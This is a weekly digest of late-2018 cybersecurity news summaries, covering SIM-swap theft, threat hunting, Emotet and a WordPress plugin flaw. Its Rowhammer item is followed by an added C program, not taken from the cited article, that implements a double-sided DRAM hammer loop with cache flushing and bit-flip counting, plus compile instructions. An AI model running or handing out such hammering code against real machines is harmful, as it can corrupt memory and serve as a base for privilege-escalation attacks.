A Review of the Best News of the Week on Cyber Threats & Defense

The phone went dark, then $1m was sucked out in SIM-swap crypto-heist (Naked Security – Sophos, Nov 26 2018)
A Silicon Valley exec lost $1m in cryptocoin savings when a 21-year-old allegedly SIM-swapped his phone.

Rowhammer Data Hacks Are More Dangerous Than Anyone Feared (Wired, Nov 21 2018)
Rowhammer attacks are fiendishly technical. They involve repeatedly accessing one “row” of memory cells in a computer’s DRAM chip, tens of thousands of times in quick succession. The idea is to “hammer” that row until electrical interference causes charge to leak from the cells in the adjacent rows. That leakage can cause a bit in a neighbouring row to “flip” from one value to the other, slightly altering the data stored in memory. A skilled Rowhammer attacker can then exploit these tiny data changes, for instance in page tables or other security-critical structures, to gain more system access. See? It’s pretty bonkers.
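As an added illustration of the mechanism described above (not code from the Wired article or from any published Rowhammer research), here is the core hammer loop alongside the bit-flip check that every Rowhammer experiment runs afterwards. It assumes an 8 KB row stride and ordinary heap memory; a real attack needs the DRAM address mapping and physically contiguous memory (for example huge pages) to put the two aggressor addresses in the rows physically adjacent to the victim, and hammers for millions of iterations. In a VM, on non-x86 hardware, or with the wrong stride the probe simply reports zero flips.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <emmintrin.h>          /* _mm_clflush, _mm_mfence (SSE2, baseline on x86-64) */
#define FLUSH(p)   _mm_clflush((const void *)(p))
#define FENCE()    _mm_mfence()
#else
#define FLUSH(p)   ((void)(p))  /* non-x86: no cache-line flush, so the loop just hits cache */
#define FENCE()    ((void)0)
#endif

/* Assumed DRAM row stride in bytes. The real value depends on the module and on
 * the physical-to-DRAM address mapping, which this example does not reverse. */
#define ROW_STRIDE (8u * 1024u)

/* Count bits that differ from `expected` across a buffer: the "did anything
 * flip?" check run on the victim row after hammering. */
size_t count_bit_flips(const uint8_t *buf, size_t len, uint8_t expected)
{
    size_t flips = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = buf[i] ^ expected;
        while (diff) { flips += diff & 1u; diff >>= 1; }
    }
    return flips;
}

/* The hammer loop: read both aggressor addresses, then evict them from the
 * cache so the next iteration goes to DRAM and re-opens the row (an ACTIVATE).
 * The volatile pointers and the returned sink stop the compiler from hoisting
 * or deleting the loads. */
unsigned long hammer(volatile uint8_t *aggr_a, volatile uint8_t *aggr_b,
                     unsigned long iterations)
{
    unsigned long sink = 0;
    for (unsigned long i = 0; i < iterations; i++) {
        sink += *aggr_a;
        sink += *aggr_b;
        FLUSH(aggr_a);
        FLUSH(aggr_b);
        FENCE();
    }
    return sink;
}

/* Double-sided hammer over a heap region: victim row in the middle, aggressors
 * one assumed row above and below. Returns the number of flipped bits, which is
 * 0 on healthy DRAM, in a VM, or when ROW_STRIDE misses the real row geometry. */
size_t rowhammer_probe(size_t region_bytes, unsigned long iterations)
{
    if (region_bytes < 3 * ROW_STRIDE) return 0;
    uint8_t *region = malloc(region_bytes);
    if (!region) return 0;
    memset(region, 0xFF, region_bytes);      /* all-ones victim pattern */

    uint8_t *victim = region + region_bytes / 2;
    hammer(victim - ROW_STRIDE, victim + ROW_STRIDE, iterations);

    size_t flips = count_bit_flips(victim, ROW_STRIDE, 0xFF);
    free(region);
    return flips;
}

/* Self-check of the detector on a constructed buffer with three flipped bits. */
size_t flip_counter_selftest(void)
{
    uint8_t buf[64];
    memset(buf, 0xFF, sizeof buf);
    buf[5]  ^= 0x01;   /* one bit cleared */
    buf[40] ^= 0x81;   /* two bits cleared */
    return count_bit_flips(buf, sizeof buf, 0xFF);
}

int main(void)
{
    printf("detector self-test flips: %zu\n", flip_counter_selftest());
    printf("flips after hammering:    %zu\n", rowhammer_probe(1u << 20, 2000000UL));
    return 0;
}
```

Compile with `cc -O2 rowhammer_probe.c` on an x86 Linux host; the `clflush` plus fence is what turns a tight read loop into DRAM row activations rather than cache hits, which is why the attack is possible from unprivileged user code in the first place.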

More on Threat Hunting (TaoSecurity, Nov 24 2018)
Earlier this week hellor00t asked via Twitter: Where would you place your security researchers/hunt team? I replied: For me, “hunt” is just a form of detection. I don’t see the need to build a “hunt” team. IR teams detect intruders using two major modes: matching and hunting. Junior people spend more time matching. Senior people spend more time hunting. Both can and should do both functions.


Even More on Threat Hunting (TaoSecurity, Nov 24 2018)
Do you consider detection through ID’ing/“matching” TTPs not hunting? To answer this question, we must begin by clarifying “TTPs.” Most readers know TTPs to mean tactics, techniques and procedures, defined by David Bianco in his Pyramid of Pain post as: How the adversary goes about accomplishing their mission, from reconnaissance all the way through data exfiltration and at every step in between.

Information Attacks against Democracies (Schneier on Security, Nov 21 2018)
Democracy is an information system. That’s the starting place of our new paper: “Common-Knowledge Attacks on Democracy.” In it, we look at democracy through the lens of information security, trying to understand the current waves of Internet disinformation attacks. Specifically, we wanted to explain why the same disinformation campaigns that act as a stabilizing influence in Russia are destabilizing in the United States.

U.S. Push on Huawei Ripples Through Markets (WSJ, Nov 26 2018)
ZTE shares fell sharply and Chinese stocks retreated more broadly as news that the U.S. was discouraging sales of Chinese telecoms gear abroad exacerbated trade concerns.

Attackers Are Landing Email Inboxes Without the Need to Phish (SecurityWeek, Nov 23 2018)
Traditionally, social engineering and intrusion techniques have been the most common ways to gain access to business email accounts and dupe individuals to wire funds to an attacker-controlled account.

6,500 Dark Web Sites Offline After Hosting Service Attacked (Dark Reading, Nov 20 2018)
The actor behind the attack on Daniel’s Hosting, and their initial point of entry, remain unknown.

UK Government Failing on CNI Security, Say MPs (Infosecurity Magazine, Nov 20 2018)
Committee criticizes lack of leadership at the top

Flash Player Update Patches Disclosed Code Execution Flaw (SecurityWeek, Nov 20 2018)
Security updates released on Tuesday by Adobe for Flash Player address a critical vulnerability whose details were disclosed a few days earlier.

Iran-Linked Hackers Use Just-in-Time Creation of Weaponized Attack Docs (SecurityWeek, Nov 19 2018)
The attacks targeted individuals of interest with malicious documents designed to deliver BONDUPDATER, a downloader that features DGA (domain generation algorithm) functionality. The attacks were carried out on August 26 and the threat actor created numerous delivery documents the week before, to test anti-virus detection rates.

Russia’s Fancy Bear and Cozy Bear Hackers May Have New Phishing Tricks (Wired, Nov 20 2018)
Two new reports show an uptick in sophisticated phishing attacks originating from—where else—Russia.

Hackers target critical WordPress plugin flaw to install backdoors and create admin accounts (Graham Cluley, Nov 21 2018)
The flaw existed in a version of the AMP for WP – Accelerated Mobile Pages plugin, designed to make web pages load faster on mobile devices. AMP for WP mysteriously disappeared from the official WordPress plugin repository on 21 October, with its 100,000+ users greeted with a message saying: “This plugin was closed on October 21, 2018 and is no longer available for download.”

Paper Trail Absence May Still Plague 2020 Election (Dark Reading, Nov 26 2018)
The recommendation for paper ballots may go unheeded in all or part of at least 6 states in the next national election.

Are we chasing the wrong zero days? (Help Net Security, Nov 26 2018)
Within the critical infrastructure sectors, the human risk factor seems to be going unnoticed. This is evidenced by a series of events that have taken place over the past couple of years.

Internal negligence to blame for most data breaches involving personal health information (Help Net Security, Nov 26 2018)
The research, published in JAMA Internal Medicine, follows the joint 2017 study that showed the magnitude of hospital data breaches in the United States. The research revealed nearly 1,800 occurrences of large data breaches in patient information over seven years, with 33 hospitals experiencing more than one substantial breach.

Reddit helps admin solve mystery of rogue Raspberry Pi (Naked Security – Sophos, Nov 22 2018)
Finding a mysterious circuit board plugged into a network that you are tasked with managing is always going to be a disconcerting moment for any sysadmin.

DoS Vulnerabilities Impact Linux Kernel (SecurityWeek, Nov 26 2018)
Two recently disclosed Linux kernel vulnerabilities that remain unpatched could be exploited for local denial-of-service (DoS).

Black Friday special by Emotet: Filling inboxes with infected XML macros (WeLiveSecurity, Nov 23 2018)
Emotet starts another massive spam campaign just as Black Friday begins to pick up steam

How to Shop Online Like a Security Pro (Krebs on Security, Nov 23 2018)
“Here’s a quick refresher course on how to make it through the next few weeks without getting snookered online.”